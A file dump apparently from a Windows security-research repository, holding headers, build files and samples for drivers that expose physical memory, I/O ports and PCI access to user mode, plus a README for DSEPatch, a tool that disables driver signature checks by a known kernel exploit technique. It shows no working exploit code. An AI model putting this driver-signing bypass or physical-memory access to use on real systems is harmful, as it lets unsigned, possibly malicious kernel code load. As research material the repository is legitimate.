32 | DLLDATA_ROUTINES( aProxyFileList, GET_DLL_CLSID )
33 |
34 | #ifdef __cplusplus
35 | } /*extern "C" */
36 | #endif
37 |
38 | /* end of generated dlldata file */
39 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strncmpi.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | int _strncmpi_a(const char *s1, const char *s2, size_t cchars)
4 | {
5 | char c1, c2;
6 |
7 | if ( s1==s2 )
8 | return 0;
9 |
10 | if ( s1==0 )
11 | return -1;
12 |
13 | if ( s2==0 )
14 | return 1;
15 |
16 | if ( cchars==0 )
17 | return 0;
18 |
19 | do {
20 | c1 = locase_a(*s1);
21 | c2 = locase_a(*s2);
22 | s1++;
23 | s2++;
24 | cchars--;
25 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
26 |
27 | return (int)(c1 - c2);
28 | }
29 |
30 | int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
31 | {
32 | wchar_t c1, c2;
33 |
34 | if ( s1==s2 )
35 | return 0;
36 |
37 | if ( s1==0 )
38 | return -1;
39 |
40 | if ( s2==0 )
41 | return 1;
42 |
43 | if ( cchars==0 )
44 | return 0;
45 |
46 | do {
47 | c1 = locase_w(*s1);
48 | c2 = locase_w(*s2);
49 | s1++;
50 | s2++;
51 | cchars--;
52 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
53 |
54 | return (int)(c1 - c2);
55 | }
56 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strncmpi.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | int _strncmpi_a(const char *s1, const char *s2, size_t cchars)
4 | {
5 | char c1, c2;
6 |
7 | if ( s1==s2 )
8 | return 0;
9 |
10 | if ( s1==0 )
11 | return -1;
12 |
13 | if ( s2==0 )
14 | return 1;
15 |
16 | if ( cchars==0 )
17 | return 0;
18 |
19 | do {
20 | c1 = locase_a(*s1);
21 | c2 = locase_a(*s2);
22 | s1++;
23 | s2++;
24 | cchars--;
25 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
26 |
27 | return (int)(c1 - c2);
28 | }
29 |
30 | int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
31 | {
32 | wchar_t c1, c2;
33 |
34 | if ( s1==s2 )
35 | return 0;
36 |
37 | if ( s1==0 )
38 | return -1;
39 |
40 | if ( s2==0 )
41 | return 1;
42 |
43 | if ( cchars==0 )
44 | return 0;
45 |
46 | do {
47 | c1 = locase_w(*s1);
48 | c2 = locase_w(*s2);
49 | s1++;
50 | s2++;
51 | cchars--;
52 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
53 |
54 | return (int)(c1 - c2);
55 | }
56 |
--------------------------------------------------------------------------------
/source/StripDebug/StripDebug.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.25420.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "StripDebug", "StripDebug.vcxproj", "{177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}.Debug|x64.ActiveCfg = Debug|x64
15 | {177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}.Debug|x64.Build.0 = Debug|x64
16 | {177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}.Release|x64.ActiveCfg = Release|x64
17 | {177E3B73-F1F9-4C70-AFFF-9474DECEDAD1}.Release|x64.Build.0 = Release|x64
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/rtltypes.h:
--------------------------------------------------------------------------------
1 | #ifndef _WCHAR_T_DEFINED
2 | typedef unsigned short wchar_t;
3 | #define _WCHAR_T_DEFINED
4 | #endif /* _WCHAR_T_DEFINED */
5 |
6 | #ifndef _SIZE_T_DEFINED
7 | #ifdef _WIN64
8 | typedef unsigned __int64 size_t;
9 | #else /* _WIN64 */
10 | typedef __w64 unsigned int size_t;
11 | #endif /* _WIN64 */
12 | #define _SIZE_T_DEFINED
13 | #endif /* _SIZE_T_DEFINED */
14 |
15 | __forceinline char locase_a(char c)
16 | {
17 | if ((c >= 'A') && (c <= 'Z'))
18 | return c + 0x20;
19 | else
20 | return c;
21 | }
22 |
23 | __forceinline wchar_t locase_w(wchar_t c)
24 | {
25 | if ((c >= 'A') && (c <= 'Z'))
26 | return c + 0x20;
27 | else
28 | return c;
29 | }
30 |
31 | __forceinline char byteabs(char x) {
32 | if (x < 0)
33 | return -x;
34 | return x;
35 | }
36 |
37 | __forceinline int _isdigit_a(char x) {
38 | return ((x >= '0') && (x <= '9'));
39 | }
40 |
41 | __forceinline int _isdigit_w(wchar_t x) {
42 | return ((x >= L'0') && (x <= L'9'));
43 | }
44 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/INPOUT/hwinterfacedrv.rc:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | #define VER_FILETYPE VFT_DRV
5 | #define VER_FILESUBTYPE VFT2_DRV_SYSTEM
6 | #ifdef _AMD64_
7 | #define VER_INTERNALNAME_STR "inpoutx64.sys"
8 | #define VER_ORIGINALFILENAME_STR "inpoutx64.sys"
9 | #define VER_PRODUCTNAME_STR "inpoutx64 Driver Version 1.2"
10 | #define VER_PRODUCTVERSION_STR "1.2 x64"
11 | #else
12 | #define VER_INTERNALNAME_STR "inpout32.sys"
13 | #define VER_ORIGINALFILENAME_STR "inpout32.sys"
14 | #define VER_PRODUCTNAME_STR "inpout32 Driver Version 1.2"
15 | #define VER_PRODUCTVERSION_STR "1.2"
16 | #endif
17 | #define VER_FILEDESCRIPTION_STR "Kernel level port access driver"
18 | #define VER_COMPANYNAME_STR "Highresolution Enterprises [www.highrez.co.uk]"
19 | #define VER_LEGALCOPYRIGHT_STR "Copyright (c) 2008 Highresolution Enterprises. Portions Copyright (c) Logix4u"
20 | #define VER_PRODUCTVERSION 1,2,00,000
21 |
22 | #include "common.ver"
23 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/INPOUT/hwinterfacedrv.h:
--------------------------------------------------------------------------------
1 |
2 | #define IOCTL_READ_PORT_UCHAR -1673519100 //CTL_CODE(40000, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
3 | #define IOCTL_WRITE_PORT_UCHAR -1673519096 //CTL_CODE(40000, 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS)
4 | #define IOCTL_READ_PORT_USHORT -1673519092 //CTL_CODE(40000, 0x803, METHOD_BUFFERED, FILE_ANY_ACCESS)
5 | #define IOCTL_WRITE_PORT_USHORT -1673519088 //CTL_CODE(40000, 0x804, METHOD_BUFFERED, FILE_ANY_ACCESS)
6 | #define IOCTL_READ_PORT_ULONG -1673519084 //CTL_CODE(40000, 0x805, METHOD_BUFFERED, FILE_ANY_ACCESS)
7 | #define IOCTL_WRITE_PORT_ULONG -1673519080 //CTL_CODE(40000, 0x806, METHOD_BUFFERED, FILE_ANY_ACCESS)
8 |
9 | #define IOCTL_WINIO_MAPPHYSTOLIN -1673519076
10 | #define IOCTL_WINIO_UNMAPPHYSADDR -1673519072
11 |
12 | #pragma pack(push)
13 | #pragma pack(1)
14 |
15 | struct tagPhys32Struct
16 | {
17 | HANDLE PhysicalMemoryHandle;
18 | SIZE_T dwPhysMemSizeInBytes;
19 | PVOID pvPhysAddress;
20 | PVOID pvPhysMemLin;
21 | };
22 |
23 | extern struct tagPhys32Struct Phys32Struct;
24 |
25 | #pragma pack(pop)
--------------------------------------------------------------------------------
/source/NtCall64_LogParser/NtCall64_LogParser.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/test/test.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include "pmdll.h"
5 |
6 | int main()
7 | {
8 | BOOL b=LoadPhyMemDriver();
9 |
10 | if (b==FALSE)
11 | {
12 | printf("load phymem.sys failed\n");
13 | exit(-1);
14 | }
15 |
16 | char *va=(char*)MapPhyMem(0xF7020, 20);
17 | printf("mapped virtual address = 0x%08x\n", va);
18 | UnmapPhyMem(va, 20);
19 |
20 | /*
21 | DWORD d=ReadPortByte(0x379);
22 | WritePortLong(0x378, 10);
23 | d=ReadPortLong(0x378);
24 | */
25 |
26 | //enumerate PCI bus
27 | for (int bus=0; bus<=255; bus++)
28 | {
29 | for (int dev=0; dev<=31; dev++)
30 | {
31 | for (int func=0; func<=7; func++)
32 | {
33 | DWORD dev_ven;
34 | if (ReadPCI(bus, dev, func, 0, 4, &dev_ven))
35 | {
36 | if (LOWORD(dev_ven)!=0xFFFF)
37 | printf("Bus %d, Device %d, Function %d, Vendor ID 0x%x, Device ID 0x%x\n",
38 | bus, dev, func, LOWORD(dev_ven), HIWORD(dev_ven));
39 | }
40 | }
41 | }
42 | }
43 |
44 | printf("end");
45 | getchar();
46 |
47 | UnloadPhyMemDriver();
48 | return 0;
49 | }
50 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/vxd/OpenLS.rc:
--------------------------------------------------------------------------------
1 | /////////////////////////////////////////////////////////////////////////////
2 | //
3 | // Version
4 | //
5 | VS_VERSION_INFO VERSIONINFO
6 | FILEVERSION 1,2,0,5
7 | PRODUCTVERSION 1,2,0,5
8 | FILEFLAGSMASK 0x3fL
9 | FILEFLAGS 0x0L
10 | FILEOS 0x40004L
11 | FILETYPE 0x2L
12 | FILESUBTYPE 0x0L
13 | BEGIN
14 | BLOCK "StringFileInfo"
15 | BEGIN
16 | BLOCK "041104b0"
17 | BEGIN
18 | VALUE "Comments", "The modified BSD license\0"
19 | VALUE "CompanyName", "OpenLibSys.org\0"
20 | VALUE "FileDescription", "WinRing0.vxd\0"
21 | VALUE "FileVersion", "1.2.0.5\0"
22 | VALUE "InternalName", "WinRing0.vxd\0"
23 | VALUE "LegalCopyright", "Copyright (C) 2007-2008 OpenLibSys.org. All rights reserved.\0"
24 | VALUE "OriginalFilename", "WinRing0.vxd\0"
25 | VALUE "ProductName", "WinRing0\0"
26 | VALUE "ProductVersion", "1.2.0.5\0"
27 | END
28 | END
29 | BLOCK "VarFileInfo"
30 | BEGIN
31 | VALUE "Translation", 0x411, 1200
32 | END
33 | END
34 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2018 - 2025 hfiref0x
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.271
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DSEPatch", "DSEPatch\DSEPatch.vcxproj", "{75CEED88-EA4C-4F16-AC88-5F223AAB0591}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {75CEED88-EA4C-4F16-AC88-5F223AAB0591}.Debug|x64.ActiveCfg = Debug|x64
15 | {75CEED88-EA4C-4F16-AC88-5F223AAB0591}.Debug|x64.Build.0 = Debug|x64
16 | {75CEED88-EA4C-4F16-AC88-5F223AAB0591}.Release|x64.ActiveCfg = Release|x64
17 | {75CEED88-EA4C-4F16-AC88-5F223AAB0591}.Release|x64.Build.0 = Release|x64
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {903A1DAC-7E4E-4237-BA77-08CB08936EA9}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/source/ROS/srvany2/srvany2.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.168
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "srvany", "srvany2\srvany2.vcxproj", "{DA2D114B-786B-4999-8338-7D2A772EAE69}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x86 = Debug|x86
11 | Release|x86 = Release|x86
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {DA2D114B-786B-4999-8338-7D2A772EAE69}.Debug|x86.ActiveCfg = Debug|Win32
15 | {DA2D114B-786B-4999-8338-7D2A772EAE69}.Debug|x86.Build.0 = Debug|Win32
16 | {DA2D114B-786B-4999-8338-7D2A772EAE69}.Release|x86.ActiveCfg = Release|Win32
17 | {DA2D114B-786B-4999-8338-7D2A772EAE69}.Release|x86.Build.0 = Release|Win32
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {9159E424-291B-45AC-B085-CD7D7837B77D}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/classfactory.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #define _IOffset(Class, itf) ((UINT_PTR)&(((Class *)0)->itf))
4 | #define IToClass(Class, itf, pitf) ((Class *)(((LPSTR)pitf)-_IOffset(Class, itf)))
5 | #define IToClassN(Class, itf, pitf) IToClass(Class, itf, pitf)
6 |
7 | typedef HRESULT(CALLBACK *LPFNCREATEINSTANCE)(IUnknown *pUnkOuter, REFIID riid, void **ppvObject);
8 |
9 | typedef struct _CClassFactory {
10 | const IClassFactoryVtbl *cf;
11 | const CLSID *pclsid;
12 | LPFNCREATEINSTANCE lpfnCreateInstance;
13 | } CClassFactory, *PCClassFactory;
14 |
15 | #define AMSI_DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \
16 | EXTERN_C const GUID DECLSPEC_SELECTANY name \
17 | = { l, w1, w2, { b1, b2, b3, b4, b5, b6, b7, b8 } }
18 |
19 | AMSI_DEFINE_GUID(CLSID_AmsiProvider, 0x1c0643e1, 0x5b0a, 0x4420, 0x9b, 0x76, 0x0d, 0xe9, 0x26, 0x4b, 0x4c, 0x59);
20 | AMSI_DEFINE_GUID(IID_AntimalwareProvider, 0xb2cabfe3, 0xfe04, 0x42b1, 0xa5, 0xdf, 0x08, 0xd4, 0x83, 0xd4, 0xd1, 0x25);
21 |
22 |
23 | STDAPI_(LONG) DllAddRef();
24 | STDAPI_(LONG) DllRelease();
25 |
26 | extern const CClassFactory g_clsmap[];
27 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/ApiSetSchemaView.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28010.2048
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ApiSetSchemaView", "ApiSetSchemaView.vcxproj", "{91352FD7-5569-4D5D-8677-735C8925A3B8}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {91352FD7-5569-4D5D-8677-735C8925A3B8}.Debug|x64.ActiveCfg = Debug|x64
15 | {91352FD7-5569-4D5D-8677-735C8925A3B8}.Debug|x64.Build.0 = Debug|x64
16 | {91352FD7-5569-4D5D-8677-735C8925A3B8}.Release|x64.ActiveCfg = Release|x64
17 | {91352FD7-5569-4D5D-8677-735C8925A3B8}.Release|x64.Build.0 = Release|x64
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {82481A72-5B56-4EC1-98A9-64BB64B2BCDA}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/winio.h:
--------------------------------------------------------------------------------
1 | #ifndef WINIO_H
2 | #define WINIO_H
3 |
4 | #include "..\drv\winio_nt.h"
5 |
6 | #ifndef WINIO_DLL
7 | #define WINIO_API _declspec(dllimport)
8 | #else
9 | #define WINIO_API
10 | #endif
11 |
12 | extern "C"
13 | {
14 | WINIO_API bool _stdcall InitializeWinIo();
15 | WINIO_API void _stdcall ShutdownWinIo();
16 | WINIO_API PBYTE _stdcall MapPhysToLin(tagPhysStruct &PhysStruct);
17 | WINIO_API bool _stdcall UnmapPhysicalMemory(tagPhysStruct &PhysStruct);
18 | WINIO_API bool _stdcall GetPhysLong(PBYTE pbPhysAddr, PDWORD pdwPhysVal);
19 | WINIO_API bool _stdcall SetPhysLong(PBYTE pbPhysAddr, DWORD dwPhysVal);
20 | WINIO_API bool _stdcall GetPortVal(WORD wPortAddr, PDWORD pdwPortVal, BYTE bSize);
21 | WINIO_API bool _stdcall SetPortVal(WORD wPortAddr, DWORD dwPortVal, BYTE bSize);
22 | WINIO_API bool _stdcall InstallWinIoDriver(PWSTR pszWinIoDriverPath, bool IsDemandLoaded = false);
23 | WINIO_API bool _stdcall RemoveWinIoDriver();
24 | }
25 |
26 | extern HANDLE hDriver;
27 | extern bool IsWinIoInitialized;
28 | extern bool g_Is64BitOS;
29 |
30 | bool _stdcall StartWinIoDriver();
31 | bool _stdcall StopWinIoDriver();
32 |
33 | #endif
34 |
--------------------------------------------------------------------------------
/source/DSEPatch/README.md:
--------------------------------------------------------------------------------
1 |
2 | # DSEPatch
3 | ## Windows x64 Driver Signature Enforcement Overrider
4 |
5 | # System Requirements
6 |
7 | x64 Windows Vista/7/8/8.1/10.
8 |
9 | Windows 10: warning, see PatchGuard note below.
10 |
11 | DSEPatch designed only for x64 Windows.
12 |
13 | Administrative privilege is required.
14 |
15 | Obsolete, do not use, see PatchGuard note below.
16 |
17 | # Build
18 |
19 | DSEPatch comes with full source code.
20 | In order to build from source you need Microsoft Visual Studio 2013 U4 and later versions.
21 |
22 | # How it work
23 |
24 | It uses WinNT/Turla VirtualBox kernel mode exploit technique to "patch" ntoskrnl callback structure filled by CI.dll. It is named g_CiCallbacks on Windows 7 and SeCiCallbacks on everything above. DSEPatch replaces CiValidateImageHeader and CiValidateImageData callbacks in this structure with stub routine that always return STATUS_SUCCESS. Original state can be restored - run dsepatch with -r command, e.g. dsepatch -r
25 |
26 | AS-IS, no warranty.
27 |
28 | # PatchGuard incompatibility
29 |
30 | Windows 10 PatchGuard is aware of this. Bugcheck is 109, 0 - generic data region.
31 |
32 | # Authors
33 |
34 | (c) 2016 - 2019 DSEPatch Project
35 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/INPOUT/ReadMe.txt:
--------------------------------------------------------------------------------
1 | InpOut32Drv Driver Interface DLL
2 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3 |
4 | Modified for x64 compatibility and built by Phillip Gibbons (Phil@highrez.co.uk).
5 | See http://www.highrez.co.uk/Downloads/InpOut32 or the Highrez Forums (http://forums.highrez.co.uk) for information.
6 | Many thanks to Red Fox UK for supporting the community and providing Driver signatures allowing Vista/7 x64 compatibility.
7 |
8 |
9 |
10 | Based on the original written by Logix4U (www.logix4u.net).
11 |
12 |
13 | Notes:
14 |
15 | The InpOut32 device driver supports writing to "old fashioned" hardware port addresses.
16 | It does NOT support USB devices such as USB Parallel ports or even PCI parallel ports (as I am lead to believe).
17 |
18 |
19 | The device driver is installed at runtime. To do this however needs administrator privileges.
20 | On Vista & later, using UAC, you can run the InstallDriver.exe in the \Win32 folder to install the driver
21 | appropriate for your OS. Doing so will request elevation and ask for your permission (or for the administrator
22 | password). Once the driver is installed for the first time, it can then be used by any user *without*
23 | administrator privileges
24 |
25 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:2.0.50727.4927
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace DumpPhys.Properties {
12 |
13 |
14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
17 |
18 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
19 |
20 | public static Settings Default {
21 | get {
22 | return defaultInstance;
23 | }
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:2.0.50727.4927
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace DumpPort.Properties {
12 |
13 |
14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
17 |
18 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
19 |
20 | public static Settings Default {
21 | get {
22 | return defaultInstance;
23 | }
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/INPOUT/license.txt:
--------------------------------------------------------------------------------
1 | Copyright (c) <2003-2015> Phil Gibbons
2 | Portions Copyright (c) <2000>
3 |
4 | Permission is hereby granted, free of charge, to any person obtaining a copy
5 | of this software and associated documentation files (the "Software"), to deal
6 | in the Software without restriction, including without limitation the rights
7 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
8 | copies of the Software, and to permit persons to whom the Software is
9 | furnished to do so, subject to the following conditions:
10 |
11 |
12 |
13 | The above copyright notice and this permission notice shall be included in
14 | all copies or substantial portions of the Software.
15 |
16 |
17 |
18 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
19 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
20 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
21 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
22 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
23 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
24 | THE SOFTWARE.
--------------------------------------------------------------------------------
/source/wdextract/wdextract/wdextract.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 | Source Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/pmdll/pmdll.h:
--------------------------------------------------------------------------------
1 | #ifndef __PMDLL_H
2 | #define __PMDLL_H
3 |
4 | #ifdef PMDLL_EXPORTS
5 | #define DLL_DECLARE __declspec(dllexport)
6 | #else
7 | #define DLL_DECLARE __declspec(dllimport)
8 | #endif
9 |
10 | #ifdef __cplusplus
11 | extern "C"
12 | {
13 | #endif
14 |
15 | //driver initialize
16 | DLL_DECLARE BOOL LoadPhyMemDriver();
17 | DLL_DECLARE VOID UnloadPhyMemDriver();
18 |
19 | //map physical memory to user space
20 | DLL_DECLARE PVOID MapPhyMem(DWORD phyAddr, DWORD memSize);
21 | DLL_DECLARE VOID UnmapPhyMem(PVOID pVirAddr, DWORD memSize);
22 |
23 | //access port
24 | DLL_DECLARE BYTE ReadPortByte(WORD portAddr);
25 | DLL_DECLARE WORD ReadPortWord(WORD portAddr);
26 | DLL_DECLARE DWORD ReadPortLong(WORD portAddr);
27 | DLL_DECLARE VOID WritePortByte(WORD portAddr, BYTE portValue);
28 | DLL_DECLARE VOID WritePortWord(WORD portAddr, WORD portValue);
29 | DLL_DECLARE VOID WritePortLong(WORD portAddr, DWORD portValue);
30 |
31 | //access PCI bus
32 | DLL_DECLARE BOOL ReadPCI(DWORD busNum, DWORD devNum, DWORD funcNum,
33 | DWORD regOff, DWORD bytes, PVOID pValue);
34 | DLL_DECLARE BOOL WritePCI(DWORD busNum, DWORD devNum, DWORD funcNum,
35 | DWORD regOff, DWORD bytes, PVOID pValue);
36 |
37 | #ifdef __cplusplus
38 | }
39 | #endif
40 |
41 | #endif //__PMDLL_H
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/test/pmdll.h:
--------------------------------------------------------------------------------
1 | #ifndef __PMDLL_H
2 | #define __PMDLL_H
3 |
4 | #ifdef PMDLL_EXPORTS
5 | #define DLL_DECLARE __declspec(dllexport)
6 | #else
7 | #define DLL_DECLARE __declspec(dllimport)
8 | #endif
9 |
10 | #ifdef __cplusplus
11 | extern "C"
12 | {
13 | #endif
14 |
15 | //driver initialize
16 | DLL_DECLARE BOOL LoadPhyMemDriver();
17 | DLL_DECLARE VOID UnloadPhyMemDriver();
18 |
19 | //map physical memory to user space
20 | DLL_DECLARE PVOID MapPhyMem(DWORD phyAddr, DWORD memSize);
21 | DLL_DECLARE VOID UnmapPhyMem(PVOID pVirAddr, DWORD memSize);
22 |
23 | //access port
24 | DLL_DECLARE BYTE ReadPortByte(WORD portAddr);
25 | DLL_DECLARE WORD ReadPortWord(WORD portAddr);
26 | DLL_DECLARE DWORD ReadPortLong(WORD portAddr);
27 | DLL_DECLARE VOID WritePortByte(WORD portAddr, BYTE portValue);
28 | DLL_DECLARE VOID WritePortWord(WORD portAddr, WORD portValue);
29 | DLL_DECLARE VOID WritePortLong(WORD portAddr, DWORD portValue);
30 |
31 | //access PCI bus
